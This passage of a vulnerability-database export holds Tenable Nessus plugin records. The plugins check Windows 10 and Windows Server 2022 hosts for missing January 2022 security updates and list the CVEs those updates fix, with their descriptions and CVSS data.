audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:'17763',\n rollup_date:'01_2022',\n bulletin:bulletin,\n rollup_kb_list:[5009557])\n \n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-20T14:13:37", "description": "The remote Windows host is missing security update 5009545.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2022-21849, CVE-2022-21850, CVE-2022-21851, CVE-2022-21874, CVE-2022-21878, CVE-2022-21892, CVE-2022-21893, CVE-2022-21922, CVE-2022-21928, CVE-2022-21958, CVE-2022-21959, CVE-2022-21960, CVE-2022-21961, CVE-2022-21962, CVE-2022-21963)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2022-21876, CVE-2022-21880, CVE-2022-21904, CVE-2022-21915)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2022-21894, CVE-2022-21900, CVE-2022-21905, CVE-2022-21913, CVE-2022-21924, CVE-2022-21925)\n\n - A session spoofing vulnerability exists. An attacker can exploit this to perform actions with the privileges of another user. (CVE-2022-21836)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2022-21843, CVE-2022-21848, CVE-2022-21883, CVE-2022-21889, CVE-2022-21890)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2022-21833, CVE-2022-21834, CVE-2022-21835, CVE-2022-21838, CVE-2022-21857, CVE-2022-21859, CVE-2022-21860, CVE-2022-21862, CVE-2022-21863, CVE-2022-21864, CVE-2022-21866, CVE-2022-21867, CVE-2022-21868, CVE-2022-21870, CVE-2022-21871, CVE-2022-21873, CVE-2022-21875, CVE-2022-21879, CVE-2022-21881, CVE-2022-21884, CVE-2022-21885, CVE-2022-21895, CVE-2022-21897, CVE-2022-21901, CVE-2022-21902, CVE-2022-21903, CVE-2022-21908, CVE-2022-21910, CVE-2022-21914, CVE-2022-21916, CVE-2022-21919, CVE-2022-21920)", "cvss3": {}, "published": "2022-01-11T00:00:00", "type": "nessus", "title": "KB5009545: Windows 10 Version 1909 Security Update (January 2022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-22947", "CVE-2021-36976", "CVE-2022-21833", "CVE-2022-21834", "CVE-2022-21835", "CVE-2022-21836", "CVE-2022-21838", "CVE-2022-21843", "CVE-2022-21847", "CVE-2022-21848", "CVE-2022-21849", "CVE-2022-21850", "CVE-2022-21851", "CVE-2022-21852", "CVE-2022-21857", "CVE-2022-21858", "CVE-2022-21859", "CVE-2022-21860", "CVE-2022-21861", "CVE-2022-21862", "CVE-2022-21863", "CVE-2022-21864", "CVE-2022-21865", "CVE-2022-21866", "CVE-2022-21867", "CVE-2022-21868", "CVE-2022-21869", "CVE-2022-21870", "CVE-2022-21871", "CVE-2022-21872", "CVE-2022-21873", "CVE-2022-21874", "CVE-2022-21875", "CVE-2022-21876", "CVE-2022-21877", "CVE-2022-21878", "CVE-2022-21879", "CVE-2022-21880", "CVE-2022-21881", "CVE-2022-21882", "CVE-2022-21883", "CVE-2022-21884", "CVE-2022-21885", "CVE-2022-21888", "CVE-2022-21889", "CVE-2022-21890", "CVE-2022-21892", "CVE-2022-21893", "CVE-2022-21894", "CVE-2022-21895", "CVE-2022-21896", "CVE-2022-21897", "CVE-2022-21898", "CVE-2022-21900", "CVE-2022-21901", "CVE-2022-21902", "CVE-2022-21903", "CVE-2022-21904", "CVE-2022-21905", "CVE-2022-21906", "CVE-2022-21908", "CVE-2022-21910", "CVE-2022-21912", "CVE-2022-21913", "CVE-2022-21914", "CVE-2022-21915", "CVE-2022-21916", "CVE-2022-21918", "CVE-2022-21919", "CVE-2022-21920", "CVE-2022-21922", "CVE-2022-21924", "CVE-2022-21925", "CVE-2022-21928", "CVE-2022-21958", "CVE-2022-21959", "CVE-2022-21960", "CVE-2022-21961", "CVE-2022-21962", "CVE-2022-21963"], "modified": "2023-01-17T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_JAN_5009545.NASL", "href": "https://www.tenable.com/plugins/nessus/156618", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(156618);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/17\");\n\n script_cve_id(\n \"CVE-2021-22947\",\n \"CVE-2021-36976\",\n \"CVE-2022-21833\",\n \"CVE-2022-21834\",\n \"CVE-2022-21835\",\n \"CVE-2022-21836\",\n \"CVE-2022-21838\",\n \"CVE-2022-21843\",\n \"CVE-2022-21847\",\n \"CVE-2022-21848\",\n \"CVE-2022-21849\",\n \"CVE-2022-21850\",\n \"CVE-2022-21851\",\n \"CVE-2022-21852\",\n \"CVE-2022-21857\",\n \"CVE-2022-21858\",\n \"CVE-2022-21859\",\n \"CVE-2022-21860\",\n \"CVE-2022-21861\",\n \"CVE-2022-21862\",\n \"CVE-2022-21863\",\n \"CVE-2022-21864\",\n \"CVE-2022-21865\",\n \"CVE-2022-21866\",\n \"CVE-2022-21867\",\n \"CVE-2022-21868\",\n \"CVE-2022-21869\",\n \"CVE-2022-21870\",\n \"CVE-2022-21871\",\n \"CVE-2022-21872\",\n \"CVE-2022-21873\",\n \"CVE-2022-21874\",\n \"CVE-2022-21875\",\n \"CVE-2022-21876\",\n \"CVE-2022-21877\",\n \"CVE-2022-21878\",\n \"CVE-2022-21880\",\n \"CVE-2022-21881\",\n \"CVE-2022-21882\",\n \"CVE-2022-21883\",\n \"CVE-2022-21885\",\n \"CVE-2022-21888\",\n \"CVE-2022-21889\",\n \"CVE-2022-21890\",\n \"CVE-2022-21892\",\n \"CVE-2022-21893\",\n \"CVE-2022-21894\",\n \"CVE-2022-21895\",\n \"CVE-2022-21896\",\n \"CVE-2022-21897\",\n \"CVE-2022-21898\",\n \"CVE-2022-21900\",\n \"CVE-2022-21901\",\n \"CVE-2022-21902\",\n \"CVE-2022-21903\",\n \"CVE-2022-21904\",\n \"CVE-2022-21905\",\n \"CVE-2022-21906\",\n \"CVE-2022-21908\",\n \"CVE-2022-21912\",\n \"CVE-2022-21913\",\n \"CVE-2022-21914\",\n \"CVE-2022-21915\",\n \"CVE-2022-21916\",\n \"CVE-2022-21918\",\n \"CVE-2022-21919\",\n \"CVE-2022-21920\",\n \"CVE-2022-21922\",\n \"CVE-2022-21924\",\n \"CVE-2022-21925\",\n \"CVE-2022-21928\",\n \"CVE-2022-21958\",\n \"CVE-2022-21959\",\n \"CVE-2022-21960\",\n \"CVE-2022-21961\",\n \"CVE-2022-21962\",\n \"CVE-2022-21963\"\n );\n script_xref(name:\"MSKB\", value:\"5009545\");\n script_xref(name:\"MSFT\", value:\"MS22-5009545\");\n script_xref(name:\"IAVA\", value:\"2022-A-0012-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0016-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/02/18\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/16\");\n\n script_name(english:\"KB5009545: Windows 10 Version 1909 Security Update (January 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5009545.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2022-21849,\n CVE-2022-21850, CVE-2022-21851, CVE-2022-21874,\n CVE-2022-21878, CVE-2022-21892, CVE-2022-21893,\n CVE-2022-21922, CVE-2022-21928, CVE-2022-21958,\n CVE-2022-21959, CVE-2022-21960, CVE-2022-21961,\n CVE-2022-21962, CVE-2022-21963)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2022-21876, CVE-2022-21880,\n CVE-2022-21904, CVE-2022-21915)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2022-21894, CVE-2022-21900, CVE-2022-21905,\n CVE-2022-21913, CVE-2022-21924, CVE-2022-21925)\n\n - A session spoofing vulnerability exists. An attacker can\n exploit this to perform actions with the privileges of\n another user. (CVE-2022-21836)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2022-21843,\n CVE-2022-21848, CVE-2022-21883, CVE-2022-21889,\n CVE-2022-21890)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2022-21833, CVE-2022-21834, CVE-2022-21835,\n CVE-2022-21838, CVE-2022-21857, CVE-2022-21859,\n CVE-2022-21860, CVE-2022-21862, CVE-2022-21863,\n CVE-2022-21864, CVE-2022-21866, CVE-2022-21867,\n CVE-2022-21868, CVE-2022-21870, CVE-2022-21871,\n CVE-2022-21873, CVE-2022-21875, CVE-2022-21879,\n CVE-2022-21881, CVE-2022-21884, CVE-2022-21885,\n CVE-2022-21895, CVE-2022-21897, CVE-2022-21901,\n CVE-2022-21902, CVE-2022-21903, CVE-2022-21908,\n CVE-2022-21910, CVE-2022-21914, CVE-2022-21916,\n CVE-2022-21919, CVE-2022-21920)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5009545\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB5009545.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-21898\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Win32k ConsoleControl Offset Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/01/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/01/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/01/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\ninclude('misc_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = \"MS22-01\";\nkbs = make_list('5009545');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:'18363',\n rollup_date:'01_2022',\n bulletin:bulletin,\n rollup_kb_list:[5009545])\n \n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:39:36", "description": "The Windows Server 2022 installation on the remote host is missing security updates. It is, therefore, affected by multiple vulnerabilities:\n\n - A session spoofing vulnerability exists. An attacker can exploit this to perform actions with the privileges of another user. (CVE-2022-21836)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2022-21849, CVE-2022-21850, CVE-2022-21851, CVE-2022-21874, CVE-2022-21888, CVE-2022-21892, CVE-2022-21893, CVE-2022-21907, CVE-2022-21922, CVE-2022-21928, CVE-2022-21958, CVE-2022-21959, CVE-2022-21960, CVE-2022-21961, CVE-2022-21962, CVE-2022-21963)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2022-21894, CVE-2022-21900, CVE-2022-21905, CVE-2022-21906, CVE-2022-21913, CVE-2022-21921, CVE-2022-21924, CVE-2022-21925)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2022-21876, CVE-2022-21877, CVE-2022-21880, CVE-2022-21915)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2022-21833, CVE-2022-21834, CVE-2022-21835, CVE-2022-21838, CVE-2022-21852, CVE-2022-21857, CVE-2022-21858, CVE-2022-21861, CVE-2022-21862, CVE-2022-21864, CVE-2022-21866, CVE-2022-21870, CVE-2022-21871, CVE-2022-21872, CVE-2022-21873, CVE-2022-21881, CVE-2022-21882, CVE-2022-21885, CVE-2022-21887, CVE-2022-21896, CVE-2022-21897, CVE-2022-21901, CVE-2022-21902, CVE-2022-21908, CVE-2022-21914, CVE-2022-21916, CVE-2022-21919, CVE-2022-21920)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2022-21843, CVE-2022-21847, CVE-2022-21848, CVE-2022-21883, CVE-2022-21889, CVE-2022-21890, CVE-2022-21918)", "cvss3": {}, "published": "2022-01-11T00:00:00", "type": "nessus", "title": "KB5009555: Windows Server 2022 Security Updates (January 2022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-22947", "CVE-2021-36976", "CVE-2022-21833", "CVE-2022-21834", "CVE-2022-21835", "CVE-2022-21836", "CVE-2022-21838", "CVE-2022-21843", "CVE-2022-21847", "CVE-2022-21848", "CVE-2022-21849", "CVE-2022-21850", "CVE-2022-21851", "CVE-2022-21852", "CVE-2022-21857", "CVE-2022-21858", "CVE-2022-21859", "CVE-2022-21860", "CVE-2022-21861", "CVE-2022-21862", "CVE-2022-21863", "CVE-2022-21864", "CVE-2022-21865", "CVE-2022-21866", "CVE-2022-21867", "CVE-2022-21868", "CVE-2022-21869", "CVE-2022-21870", "CVE-2022-21871", "CVE-2022-21872", "CVE-2022-21873", "CVE-2022-21874", "CVE-2022-21875", "CVE-2022-21876", "CVE-2022-21877", "CVE-2022-21878", "CVE-2022-21879", "CVE-2022-21880", "CVE-2022-21881", "CVE-2022-21882", "CVE-2022-21883", "CVE-2022-21884", "CVE-2022-21885", "CVE-2022-21887", "CVE-2022-21888", "CVE-2022-21889", "CVE-2022-21890", "CVE-2022-21892", "CVE-2022-21893", "CVE-2022-21894", "CVE-2022-21895", "CVE-2022-21896", "CVE-2022-21897", "CVE-2022-21898", "CVE-2022-21900", "CVE-2022-21901", "CVE-2022-21902", "CVE-2022-21903", "CVE-2022-21904", "CVE-2022-21905", "CVE-2022-21906", "CVE-2022-21907", "CVE-2022-21908", "CVE-2022-21910", "CVE-2022-21913", "CVE-2022-21914", "CVE-2022-21915", "CVE-2022-21916", "CVE-2022-21918", "CVE-2022-21919", "CVE-2022-21920", "CVE-2022-21921", "CVE-2022-21922", "CVE-2022-21924", "CVE-2022-21925", "CVE-2022-21928", "CVE-2022-21958", "CVE-2022-21959", "CVE-2022-21960", "CVE-2022-21961", "CVE-2022-21962", "CVE-2022-21963"], "modified": "2023-01-17T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_JAN_5009555.NASL", "href": "https://www.tenable.com/plugins/nessus/156620", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc. \n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(156620);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/17\");\n\n script_cve_id(\n \"CVE-2021-22947\",\n \"CVE-2021-36976\",\n \"CVE-2022-21833\",\n \"CVE-2022-21834\",\n \"CVE-2022-21835\",\n \"CVE-2022-21836\",\n \"CVE-2022-21838\",\n \"CVE-2022-21843\",\n \"CVE-2022-21847\",\n \"CVE-2022-21848\",\n \"CVE-2022-21849\",\n \"CVE-2022-21850\",\n \"CVE-2022-21851\",\n \"CVE-2022-21852\",\n \"CVE-2022-21857\",\n \"CVE-2022-21858\",\n \"CVE-2022-21859\",\n \"CVE-2022-21860\",\n \"CVE-2022-21861\",\n \"CVE-2022-21862\",\n \"CVE-2022-21863\",\n \"CVE-2022-21864\",\n \"CVE-2022-21865\",\n \"CVE-2022-21866\",\n \"CVE-2022-21867\",\n \"CVE-2022-21868\",\n \"CVE-2022-21869\",\n \"CVE-2022-21870\",\n \"CVE-2022-21871\",\n \"CVE-2022-21872\",\n \"CVE-2022-21873\",\n \"CVE-2022-21874\",\n \"CVE-2022-21875\",\n \"CVE-2022-21876\",\n \"CVE-2022-21877\",\n \"CVE-2022-21878\",\n \"CVE-2022-21879\",\n \"CVE-2022-21880\",\n \"CVE-2022-21881\",\n \"CVE-2022-21882\",\n \"CVE-2022-21883\",\n \"CVE-2022-21884\",\n \"CVE-2022-21885\",\n \"CVE-2022-21888\",\n \"CVE-2022-21889\",\n \"CVE-2022-21890\",\n \"CVE-2022-21892\",\n \"CVE-2022-21893\",\n \"CVE-2022-21894\",\n \"CVE-2022-21895\",\n \"CVE-2022-21896\",\n \"CVE-2022-21897\",\n \"CVE-2022-21898\",\n \"CVE-2022-21900\",\n \"CVE-2022-21901\",\n \"CVE-2022-21902\",\n \"CVE-2022-21903\",\n \"CVE-2022-21904\",\n \"CVE-2022-21905\",\n \"CVE-2022-21906\",\n \"CVE-2022-21907\",\n \"CVE-2022-21908\",\n \"CVE-2022-21910\",\n \"CVE-2022-21913\",\n \"CVE-2022-21914\",\n \"CVE-2022-21915\",\n \"CVE-2022-21916\",\n \"CVE-2022-21918\",\n \"CVE-2022-21919\",\n \"CVE-2022-21920\",\n \"CVE-2022-21921\",\n \"CVE-2022-21922\",\n \"CVE-2022-21924\",\n \"CVE-2022-21925\",\n \"CVE-2022-21928\",\n \"CVE-2022-21958\",\n \"CVE-2022-21959\",\n \"CVE-2022-21960\",\n \"CVE-2022-21961\",\n \"CVE-2022-21962\",\n \"CVE-2022-21963\"\n );\n script_xref(name:\"MSKB\", value:\"5009555\");\n script_xref(name:\"MSFT\", value:\"MS22-5009555\");\n script_xref(name:\"IAVA\", value:\"2022-A-0012-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0016-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/02/18\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/16\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2022-0001\");\n\n script_name(english:\"KB5009555: Windows Server 2022 Security Updates (January 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Windows Server 2022 installation on the remote host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Windows Server 2022 installation on the remote host is missing\nsecurity updates. It is, therefore, affected by multiple\nvulnerabilities:\n\n - A session spoofing vulnerability exists. An attacker can\n exploit this to perform actions with the privileges of\n another user. (CVE-2022-21836)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2022-21849,\n CVE-2022-21850, CVE-2022-21851, CVE-2022-21874,\n CVE-2022-21888, CVE-2022-21892, CVE-2022-21893,\n CVE-2022-21907, CVE-2022-21922, CVE-2022-21928,\n CVE-2022-21958, CVE-2022-21959, CVE-2022-21960,\n CVE-2022-21961, CVE-2022-21962, CVE-2022-21963)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2022-21894, CVE-2022-21900, CVE-2022-21905,\n CVE-2022-21906, CVE-2022-21913, CVE-2022-21921,\n CVE-2022-21924, CVE-2022-21925)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2022-21876, CVE-2022-21877,\n CVE-2022-21880, CVE-2022-21915)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2022-21833, CVE-2022-21834, CVE-2022-21835,\n CVE-2022-21838, CVE-2022-21852, CVE-2022-21857,\n CVE-2022-21858, CVE-2022-21861, CVE-2022-21862,\n CVE-2022-21864, CVE-2022-21866, CVE-2022-21870,\n CVE-2022-21871, CVE-2022-21872, CVE-2022-21873,\n CVE-2022-21881, CVE-2022-21882, CVE-2022-21885,\n CVE-2022-21887, CVE-2022-21896, CVE-2022-21897,\n CVE-2022-21901, CVE-2022-21902, CVE-2022-21908,\n CVE-2022-21914, CVE-2022-21916, CVE-2022-21919,\n CVE-2022-21920)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2022-21843,\n CVE-2022-21847, CVE-2022-21848, CVE-2022-21883,\n CVE-2022-21889, CVE-2022-21890, CVE-2022-21918)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5009555\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released KB5009555 to address this issue.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-21907\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Win32k ConsoleControl Offset Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/01/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/01/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/01/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\ninclude('misc_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = \"MS22-01\";\nkbs = make_list('5009555');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:'20348',\n rollup_date:'01_2022',\n bulletin:bulletin,\n rollup_kb_list:[5009555])\n \n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:39:55", "description": "The remote Windows host is missing security update 5009543.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2022-21849, CVE-2022-21850, CVE-2022-21851, CVE-2022-21874, CVE-2022-21878, CVE-2022-21892, CVE-2022-21893, CVE-2022-21922, CVE-2022-21928, CVE-2022-21958, CVE-2022-21959, CVE-2022-21960, CVE-2022-21961, CVE-2022-21962, CVE-2022-21963)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2022-21876, CVE-2022-21880, CVE-2022-21904, CVE-2022-21915)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2022-21894, CVE-2022-21900, CVE-2022-21905, CVE-2022-21913, CVE-2022-21924, CVE-2022-21925)\n\n - A session spoofing vulnerability exists. An attacker can exploit this to perform actions with the privileges of another user. (CVE-2022-21836)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2022-21843, CVE-2022-21848, CVE-2022-21883, CVE-2022-21889, CVE-2022-21890)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2022-21833, CVE-2022-21834, CVE-2022-21835, CVE-2022-21838, CVE-2022-21857, CVE-2022-21859, CVE-2022-21860, CVE-2022-21862, CVE-2022-21863, CVE-2022-21864, CVE-2022-21866, CVE-2022-21867, CVE-2022-21868, CVE-2022-21870, CVE-2022-21871, CVE-2022-21873, CVE-2022-21875, CVE-2022-21879, CVE-2022-21881, CVE-2022-21884, CVE-2022-21885, CVE-2022-21895, CVE-2022-21897, CVE-2022-21901, CVE-2022-21902, CVE-2022-21903, CVE-2022-21908, CVE-2022-21910, CVE-2022-21914, CVE-2022-21916, CVE-2022-21919, CVE-2022-21920)", "cvss3": {}, "published": "2022-01-11T00:00:00", "type": "nessus", "title": "KB5009543: Windows 10 Version 20H2 / 21H1 / 21H2 Security Update (January 2022) ", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-22947", "CVE-2021-36976", "CVE-2022-21833", "CVE-2022-21834", "CVE-2022-21835", "CVE-2022-21836", "CVE-2022-21838", "CVE-2022-21843", "CVE-2022-21847", "CVE-2022-21848", "CVE-2022-21849", "CVE-2022-21850", "CVE-2022-21851", "CVE-2022-21852", "CVE-2022-21857", "CVE-2022-21858", "CVE-2022-21859", "CVE-2022-21860", "CVE-2022-21861", "CVE-2022-21862", "CVE-2022-21863", "CVE-2022-21864", "CVE-2022-21865", "CVE-2022-21866", "CVE-2022-21867", "CVE-2022-21868", "CVE-2022-21869", "CVE-2022-21870", "CVE-2022-21871", "CVE-2022-21872", "CVE-2022-21873", "CVE-2022-21874", "CVE-2022-21875", "CVE-2022-21876", "CVE-2022-21877", "CVE-2022-21878", "CVE-2022-21879", "CVE-2022-21880", "CVE-2022-21881", "CVE-2022-21882", "CVE-2022-21883", "CVE-2022-21884", "CVE-2022-21885", "CVE-2022-21888", "CVE-2022-21889", "CVE-2022-21890", "CVE-2022-21892", "CVE-2022-21893", "CVE-2022-21894", "CVE-2022-21895", "CVE-2022-21896", "CVE-2022-21897", "CVE-2022-21898", "CVE-2022-21900", "CVE-2022-21901", "CVE-2022-21902", "CVE-2022-21903", "CVE-2022-21904", "CVE-2022-21905", "CVE-2022-21906", "CVE-2022-21907", 